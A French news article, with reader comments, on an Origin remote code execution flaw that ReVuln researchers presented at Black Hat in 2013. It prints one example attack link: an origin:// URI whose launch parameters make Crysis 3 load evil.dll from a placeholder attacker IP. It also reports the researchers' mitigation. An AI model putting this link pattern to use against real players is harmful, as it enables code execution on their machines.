Electronic Arts est décidément sous le feu des projecteurs ces derniers temps, et pas pour de bonnes raisons. Après les soucis de SimCity, c'est au tour de la plateforme Origin de poser des problèmes à l'éditeur, puisqu'une faille très facilement exploitable rend vulnérable n'importe quelle machine à une attaque extérieure.
Electronic Arts revendique un peu plus de 40 millions d'usagers sur sa plateforme Origin, et tous peuvent désormais être la victime d'attaques malveillantes. Nos confrères d'Ars Technica ont relevé durant la conférence Black Hat, s'étant déroulée du 12 au 15 mars à Amsterdam qu'une équipe originaire de Malte est parvenue à utiliser Origin pour attaquer des Macs et des PC.
Donato Ferrante et Luigi Auriemma, deux chercheurs travaillant pour ReVuln, et auteurs de cette découverte, expliquent que la faille découverte ne demande que quelques secondes pour être exploitée. Dans certains cas, aucune interaction avec la victime n'est requise. Notez qu'il n'est pas nécéssaire qu'Origin soit actif pour que la brêche fonctionne, sa seule installation sur le système est suffisante.
Une démonstration qui semble très simple
La démonstration faite par les deux hommes est assez simple, il suffit de trouver un moyen de permettre d'activer l'exécution de code à distance sur la machine cible. Dans le cas d'un joueur de Crysis 3, les chercheurs utilisent le NVidia Benchmark framework intégré dans le moteur CryEngine. Il suffit ensuite de créer un lien Origin afin que la plateforme récupère au prochain lancement du jeu le fichier que l'on souhaite introduire dans la machine cible. Le lien prend la forme suivante :
origin://LaunchGame/71503?CommandParams= -openautomate \\IP_ATTAQUANT\evil.dll
La faille rappelle une de celles découvertes dans Steam
Cependant, il faut noter que la plateforme d'EA n'est pas la seule à être touchée par ce genre de vulnérabilité. En effet, un cas similaire avait touché Steam au mois d'octobre. Si l'intégrité du client de la plateforme n'était pas atteinte, certains pirates faisaient précéder leurs URLs par « Steam:// » pour berner les navigateurs, clients emails ou toutes sortes d'applications afin qu'elles exécutent du code malveillant.
La parade était assez simple puisqu'il suffisait de désactiver le lancement automatique des URL débutant par Steam://. Le même genre de solution est proposée par les chercheurs aux utilisateurs d'Origin, qui leur suggèrent de paramétrer leur navigateur afin qu'il demande une confirmation avant d'exécuter un tel lien. Nous vous laissons maintenant découvrir la faille en images.
Commentaires (58)
#1
J’ai comblé la faille, j’ai pas acheté Crysis 3 " />
#2
#3
#4
J’ai comblé la faille j’ai viré Origin, qui ne me servait plus de toutes façons. :)
#5
#6
#7
#8
#9
#10
Suffit de ne lancer aucun jeu Origin donc. Oh wait.
#11
Je comprend pas trop la fonctionnement de cette faille, il faut ouvrir un lien qui fait télécharger un fichier qui se copie sur la machine pour l’infecter?
Maintenant je ne vois pas comment arriver à le mettre en place sur une machine ciblée.
Il faut donc cliquer sur un lien dans un navigateur qui va donc au final lancer un jeu? Il faut aussi que le jeu du lien soit installé sur la machine?
#12
Attaquer Windows ou un Mac, c’est simple comme un lien Origin
" />
Faut-il rappeler que “PC” ne désigne que le hardware, et qu’il est possible d’y installer Windows, GNU/Linux, UNIX…
Ce serait appréciable de ne pas trop entretenir l’égalité “PC = Windows” " />
#13
oulala je vais le désinstaller, en plus il est pas à jour du tout…
#14
#15
J’ai pas Origin ce qui simplifie les choses pour moi ^^
#16
Crysis n’est pas un jeu mais un logiciel de benchmark. " />
#17
#18
Vive le Cloud" />
#19
#20
#21
#22
Ceci dit le jeu n’est pas excellent pour autant, les ennemis sont relativement idiots par exemple, mais je tenais à apporter mon point de vue sur la durée de vie du jeu
Invisibilité permanente + Arc, jeu torché
" />
#23
#24
N’étant pas du tout un spécialiste je n’ai pas bien compris l’affaire… mais, comme ça, à vue de nez, effectivement, c’est grave.
Ma question : sur PS3, un pirate peut-il utiliser cette faille ?
#25
#26
il pourrait etre INterressant que PCI donne la marche a suivre ou un lien vers un article expliquant comment desactiver / limiter l’interpretation des url origin://
" />
#27
#28
de toutes les facons vous pouvez tous presumer que vos ordinateurs/tablettes/smartphones soient des bots qui font des choses sans que vous le sachiez (gaffe au webcam et micro). RE-de toutes les facons il faut des competences que peu ont, et c’est relou a detecter meme pour ceux qui les capacites.
#29
#30
Réponse d’un porte-parole d’EA : “Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure.”
Source
#31
#32
#33
#34
#35
#36
#37
#38
#39
#40
#41
#42
J’ai eu une màj d’origin à midi, est-ce lié au problème ?
" />
#43
#44
#45
#46
#47
une équipe originaire de Malte est parvenue à utiliser Origin pour attaquer des Macs et des PC
Faux. Mon PC sous Linux ne craint rien.
#48
J’ai acheter ME3 (pour basculer dans la légalité" />) depuis env 1 mois….à quoi sert origin* ?
* mis à part le besoin et l’absolu necessité pour EA de tout savoir tout sur moi et, accessoirement, de me foutre une laisse au cul en se foutant de ma gueulle…
#49
#50
La portion de code dans l’article est illisible sur version mobile (gris clair sur blanc)
#51
#52
#53
#54
#55
#56
c’est aussi simple que d’attaquer le Ma" />li
#57
#58